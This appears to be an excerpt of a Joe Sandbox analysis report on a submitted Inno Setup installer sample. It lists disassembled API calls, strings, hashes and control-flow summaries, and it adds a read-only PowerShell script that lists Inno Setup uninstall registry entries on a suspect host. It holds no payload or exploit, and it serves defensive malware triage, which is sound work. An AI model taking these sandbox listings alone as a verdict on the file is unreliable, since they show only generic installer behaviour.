                                                                                            • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 0046FC99
                                                                                            • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 0046FCA8
                                                                                            • , xrefs: 0046FBB3, 0046FD84, 0046FE02
                                                                                            • Stripped read-only attribute., xrefs: 0046FEAB
                                                                                            • Incrementing shared file count (32-bit)., xrefs: 00470562
                                                                                            • Existing file has a later time stamp. Skipping., xrefs: 0046FDB3
                                                                                            • Dest filename: %s, xrefs: 0046F878
                                                                                            • Time stamp of our file: (failed to read), xrefs: 0046F98B
                                                                                            • Existing file is a newer version. Skipping., xrefs: 0046FBE6
                                                                                            • Same version. Skipping., xrefs: 0046FCC9
                                                                                            • .tmp, xrefs: 0046FF9B
                                                                                            • InUn, xrefs: 00470129
                                                                                            • Same time stamp. Skipping., xrefs: 0046FD39
                                                                                            • Version of existing file: (none), xrefs: 0046FCDE
                                                                                            • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 0046FCB4
                                                                                            • User opted not to overwrite the existing file. Skipping., xrefs: 0046FE31
                                                                                            • Time stamp of existing file: (failed to read), xrefs: 0046FA1B
                                                                                            • Version of our file: %u.%u.%u.%u, xrefs: 0046FAD4
                                                                                            • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046FE7A
                                                                                            • Time stamp of existing file: %s, xrefs: 0046FA0F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd

                                                                                            APIs
                                                                                            • AllocateAndInitializeSid.ADVAPI32(00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DFFE
                                                                                            • GetVersion.KERNEL32(00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E01B
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E034
                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E03A
                                                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E04F
                                                                                            • FreeSid.ADVAPI32(00000000,0042E1AF,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E1A2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                            • String ID: CheckTokenMembership$advapi32.dll

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4d8523de1586cc0fe21acf482102c1559735113aa6e2fedad80b263b22362a32
                                                                                            • Instruction ID: b8faa7015d3197e79f6d1719c020e5f6697e37216349d11362fcbf3b9a892ac2
                                                                                            • Opcode Fuzzy Hash: 4d8523de1586cc0fe21acf482102c1559735113aa6e2fedad80b263b22362a32
                                                                                            • Instruction Fuzzy Hash: 42E1A230700125EFD704EF69E989A6EB7B5EF94304F9480A6E545AB352C73CEE91DB08
                                                                                            APIs
                                                                                              • Part of subcall function 00493D2C: GetWindowRect.USER32(00000000), ref: 00493D42
                                                                                            • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00466E8B
                                                                                              • Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00466EA5), ref: 0041D6EB
                                                                                              • Part of subcall function 00466898: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046693B
                                                                                              • Part of subcall function 00466898: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466961
                                                                                              • Part of subcall function 00466898: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004669B8
                                                                                              • Part of subcall function 00466254: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466F40,00000000,00000000,00000000,0000000C,00000000), ref: 0046626C
                                                                                              • Part of subcall function 00493FB0: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00493FBA
                                                                                              • Part of subcall function 0042EBAC: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
                                                                                              • Part of subcall function 0042EBAC: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39
                                                                                              • Part of subcall function 00493C7C: 73A0A570.USER32(00000000,?,?,?), ref: 00493C9E
                                                                                              • Part of subcall function 00493C7C: SelectObject.GDI32(?,00000000), ref: 00493CC4
                                                                                              • Part of subcall function 00493C7C: 73A0A480.USER32(00000000,?,00493D22,00493D1B,?,00000000,?,?,?), ref: 00493D15
                                                                                              • Part of subcall function 00493FA0: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00493FAA
                                                                                            • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,021AD8D0,021AF524,?,?,021AF554,?,?,021AF5A4,?), ref: 00467B3B
                                                                                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00467B4C
                                                                                            • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00467B64
                                                                                              • Part of subcall function 0042A06C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A082
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                                                            • String ID: $(Default)$STOPIMAGE
                                                                                            • API String ID: 3271511185-770201673
                                                                                            • Opcode ID: 37423c6cb51a93f280f9daeb0ce5abe33e3f8599bfcda42b6dea5e3f600f0df5
                                                                                            • Instruction ID: 7cc469b3bd63a428f44d838a58e066ff967143afc9c1970ffe4cf99f77f4ae1f
                                                                                            • Opcode Fuzzy Hash: 37423c6cb51a93f280f9daeb0ce5abe33e3f8599bfcda42b6dea5e3f600f0df5
                                                                                            • Instruction Fuzzy Hash: 9DF2C6386005148FCB00EB59D5D9F9973F1FF4A308F1542B6E5049B36ADB78AC4ACB8A
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 00473F61
                                                                                            • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047403E
                                                                                            • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047404C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                            • String ID: unins$unins???.*
                                                                                            • API String ID: 3541575487-1009660736
                                                                                            • Opcode ID: 74e8728ae2360d7cc9e6142747c4e784bc21d11db711cb29493a318ee3c6f59d
                                                                                            • Instruction ID: 4fd1d9fbc71e550ec417509903356e65f0bc22e0d19a654d6a5f314750c2dfa9
                                                                                            • Opcode Fuzzy Hash: 74e8728ae2360d7cc9e6142747c4e784bc21d11db711cb29493a318ee3c6f59d
                                                                                            • Instruction Fuzzy Hash: 3D3163746001489FCB20EB65C981AEEB7BDDF84304F5184B6E50CAB2A2DB39DF458F58
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00452123,?,?,-00000001,00000000), ref: 004520FD
                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,00452123,?,?,-00000001,00000000), ref: 00452105
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileFindFirstLast
                                                                                            • String ID:
                                                                                            • API String ID: 873889042-0
                                                                                            • Opcode ID: 53d0b0f71413149149492da54f6d795d092e0f5f146a7a05654b1b551a70fbd2
                                                                                            • Instruction ID: f9611aeb3029889b76a7ade8829495a9d918b249c8fbd3e45bbd36cd3e6629b4
                                                                                            • Opcode Fuzzy Hash: 53d0b0f71413149149492da54f6d795d092e0f5f146a7a05654b1b551a70fbd2
                                                                                            • Instruction Fuzzy Hash: 1DF04931A04604AB8B10DB6AAD0149FB7FCDB46725710467BFC14E3282EA784E088598
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(?,0046D1AE), ref: 0046D122
                                                                                            • CoCreateInstance.OLE32(00498B64,00000000,00000001,00498B74,?,?,0046D1AE), ref: 0046D13E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateInstanceVersion
                                                                                            • String ID:
                                                                                            • API String ID: 1462612201-0
                                                                                            • Opcode ID: 7e99c10d7870a2a4e40b689fd77bd4c1fbc398cb1ecae8ca6f7261d0d29e43fa
                                                                                            • Instruction ID: 1e059e1ff20256b2d38cad76cdb56475a0db9ba99d2cbde6061077ac095a0934
                                                                                            • Opcode Fuzzy Hash: 7e99c10d7870a2a4e40b689fd77bd4c1fbc398cb1ecae8ca6f7261d0d29e43fa
                                                                                            • Instruction Fuzzy Hash: 56F0A7B0B40301DEEB10AB2ADD46B8B37C19713324F04413BB054962A0E7ED8880CB9F
                                                                                            APIs
                                                                                            • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID:
                                                                                            • API String ID: 2299586839-0
                                                                                            • Opcode ID: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                                            • Instruction ID: d3b8e551ebd18b966166ca098383beb9494d3946d3c482517005b7019d2e894c
                                                                                            • Opcode Fuzzy Hash: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                                            • Instruction Fuzzy Hash: EEE0D87170021467D711A95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE8046ED
                                                                                            APIs
                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: NtdllProc_Window
                                                                                            • String ID:
                                                                                            • API String ID: 4255912815-0
                                                                                            • Opcode ID: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
                                                                                            • Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
                                                                                            • Opcode Fuzzy Hash: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
                                                                                            • Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: NameUser
                                                                                            • String ID:
                                                                                            • API String ID: 2645101109-0
                                                                                            • Opcode ID: b308eefd78fc34ccedab6b1389f53df2d3f8bc27a278cf7cb0c73ee59b873f37
                                                                                            • Instruction ID: 76809c6cbed83fd478a986dc42ef3113a42af1b7be0c57f55a4460954ad8dcd3
                                                                                            • Opcode Fuzzy Hash: b308eefd78fc34ccedab6b1389f53df2d3f8bc27a278cf7cb0c73ee59b873f37
                                                                                            • Instruction Fuzzy Hash: 54D0CD7534430063C7006AA99C82597358C4784305F00443F7CC5DA2C3E5BDDA88565A
                                                                                            APIs
                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F3B0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: NtdllProc_Window
                                                                                            • String ID:
                                                                                            • API String ID: 4255912815-0
                                                                                            • Opcode ID: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
                                                                                            • Instruction ID: f6c568c4939315a2eda578795105166964a56c952c5b5facb2271ccc97efa3bd
                                                                                            • Opcode Fuzzy Hash: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
                                                                                            • Instruction Fuzzy Hash: B8D05E7221010D6B8B00DE99D840C6F33AC9B88700BA08825F948C7205C634EC108BA4

Control-flow Graph

(rendered graph omitted; basic blocks 0046E080-0046E6D9. Each registry value is written through the RegSetValueExA wrapper at 0046DE6C, with RegCloseKey in the exit block at 0046E6C3; a 0049314C subcall sits in the 0046E66B branch before the close.)
                                                                                            APIs
                                                                                              • Part of subcall function 0046DE6C: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F
                                                                                            • RegCloseKey.ADVAPI32(?,0046E6E1,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046E72C,?,?,0049B178,00000000), ref: 0046E6D4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseValue
                                                                                            • String ID: " /SILENT$5.4.0 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                            • API String ID: 3132538880-1122008755
                                                                                            • Opcode ID: 8e42fddb56d3329dbef7a6a297206f9074c7af5ead7140c5731b4336ecc3ba8d
                                                                                            • Instruction ID: d6e88d1f6cb7b2cefc9fba2fbd39931f8be9331f85677ee55fb68547bd3bf3cf
                                                                                            • Opcode Fuzzy Hash: 8e42fddb56d3329dbef7a6a297206f9074c7af5ead7140c5731b4336ecc3ba8d
                                                                                            • Instruction Fuzzy Hash: C3123034F001089BCB04EB56E981ADE77F5EF58304F60807BE8116B3A5EB79AD45CB5A
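The function above writes the standard Inno Setup uninstall entry under Software\Microsoft\Windows\CurrentVersion\Uninstall\<AppId>_is1 (RegSetValueExA through the wrapper at 0046DE6C for each value in the String ID list, then RegCloseKey), so a host that ran this sample carries an Inno Setup uninstall record of the same shape that any legitimate Inno-built installer leaves. The inventory below is an added triage check and is not part of the Joe Sandbox report or of the sample's own code; it relies only on the value names listed in the String ID above. The AppId that precedes _is1 is not recoverable from the report, so the script lists every *_is1 key in both HKLM registry views and in HKCU rather than guessing a name.

```powershell
# Added triage check (not from the Joe Sandbox report): list Inno Setup uninstall
# entries. The report shows the sample writing ...\Uninstall\<AppId>_is1 with the
# value names below; the AppId itself is unknown, so every *_is1 key is shown.
$roots = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall'
)

# Value names taken from the String ID list of the function above.
$props = @(
    'DisplayName', 'DisplayVersion', 'Publisher', 'InstallDate', 'InstallLocation',
    'UninstallString', 'QuietUninstallString', 'DisplayIcon',
    'Inno Setup: App Path', 'Inno Setup: Setup Version', 'Inno Setup: User',
    'Inno Setup: Selected Tasks', 'Inno Setup: Language'
)

$entries = foreach ($root in $roots) {
    if (-not (Test-Path -Path $root)) { continue }
    Get-ChildItem -Path $root -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -like '*_is1' } |
        ForEach-Object {
            $values = Get-ItemProperty -Path $_.PSPath
            $row = [ordered]@{
                Key = ($_.PSPath -replace '^Microsoft\.PowerShell\.Core\\Registry::', '')
            }
            # Dynamic property access handles names containing spaces and colons.
            foreach ($p in $props) { $row[$p] = $values.$p }
            [pscustomobject]$row
        }
}

# Sort so entries whose InstallLocation is outside Program Files surface first;
# those are the ones worth pulling the referenced binary for.
$entries |
    Sort-Object -Property @{ Expression = {
        $loc = [string]$_.InstallLocation
        if ($loc -and ($loc -notmatch '^[A-Za-z]:\\Program Files')) { 0 } else { 1 }
    } } |
    Format-List
```

Run it in an elevated PowerShell on the suspect host, or point the HKLM roots at an offline SOFTWARE hive mounted with `reg load`. An _is1 entry is not an indicator on its own, since every Inno Setup installer produces one; what is worth a second look is an entry whose DisplayName or Publisher does not match any software the user installed, or whose UninstallString, DisplayIcon or Inno Setup: App Path resolves outside Program Files, for example into a user-writable directory.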

Control-flow Graph

(rendered graph omitted; basic blocks 00490C98-0049118C. The graph is a chain of string comparisons, one branch per name in the String ID list below, each ending in the matching Windows API: Sleep, FindWindowA, SendMessageA, PostMessageA, SendNotifyMessageA, RegisterClipboardFormatA, GetProcAddress, GetLastError, FreeLibrary, CreateMutexA, OemToCharBuffA and CharToOemBuffA, all rejoining at 00491172. Only the Sleep and FindWindowA branches are listed as executed in the APIs section.)
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000000,00000000,0049118D,?,?,?,?,00000000,00000000,00000000), ref: 00490CD8
                                                                                            • FindWindowA.USER32(00000000,00000000), ref: 00490D09
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: FindSleepWindow
                                                                                            • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                            • API String ID: 3078808852-3310373309
                                                                                            • Opcode ID: 4688106ba75806e635d0f748856e326098f1ac44329b3e50716d9597bb099cff
                                                                                            • Instruction ID: 3689c34fe079b887eecbe3c8abd258a9be24a9666ebde3bfb919725182042c62
                                                                                            • Opcode Fuzzy Hash: 4688106ba75806e635d0f748856e326098f1ac44329b3e50716d9597bb099cff
                                                                                            • Instruction Fuzzy Hash: 8EC19C60B002026BDB14BB3E8C8291E599A9FC9708B11D93FF546EB79ACD3DDD06435E

Control-flow Graph

(rendered graph omitted; basic blocks 00481DF0-00481EC6. The entry block resolves GetNativeSystemInfo from kernel32.dll by name and, if present, also IsWow64Process, GetSystemWow64DirectoryA and RegDeleteKeyExA from advapi32.dll, falling back to GetSystemInfo at 00481E7C when the export is missing; a 00451D7C subcall guards the IsWow64Process branch.)
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00481E01
                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00481E0E
                                                                                            • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E1C
                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00481E24
                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00481E30
                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00481E51
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00481E64
